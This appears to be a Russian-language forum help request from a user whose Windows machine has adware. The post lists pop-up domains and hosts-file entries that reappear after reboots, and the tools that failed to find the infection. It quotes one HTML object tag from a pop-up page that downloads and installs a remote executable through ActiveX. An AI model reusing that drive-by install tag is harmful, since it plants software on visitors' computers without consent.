Вот и меня не избежала эта участь..
Подробнее - сами открываются попапы со следующими адресами :
adserver.sharewareonline.com
smiliesheaven.com
xzoomy.com
popularscreensavers.com
и другие..
Открываются сами, даже когда IE не работает.
В файле hosts после ребута появляются вот такие записи :
Код:
127.0.0.1 www.igetnet.com
127.0.0.1 code.ignphrases.com
127.0.0.1 clear-search.com
127.0.0.1 r1.clrsch.com
127.0.0.1 sds.clrsch.com
127.0.0.1 status.clrsch.com
127.0.0.1 www.clrsch.com
127.0.0.1 clr-sch.com
127.0.0.1 sds-qckads.com
127.0.0.1 status.qckads.com
В реестре по этим данным ничего не нахожу. RegMon ничего информативного не мониторит, когда эти попапы открываются.
Антивирь (symantec enterprise 9) ничего не находит.
Также молчат Ad-Aware, SpyBot, Spy Sweeper и HiJackThis.
Objects / Temporary Internet Files / Cookies я потёр..
Ну и где/как искать заразу?
Кстати, в одном из попапов (xzoomy.com) есть вот такой код :
Код:
<object id=install classid="CLSID:13197ACE-6851-45c3-A7FF-C281324D5489" codebase="http://www.2nd-thought.com/files/install100.exe">
Вот наглость, а?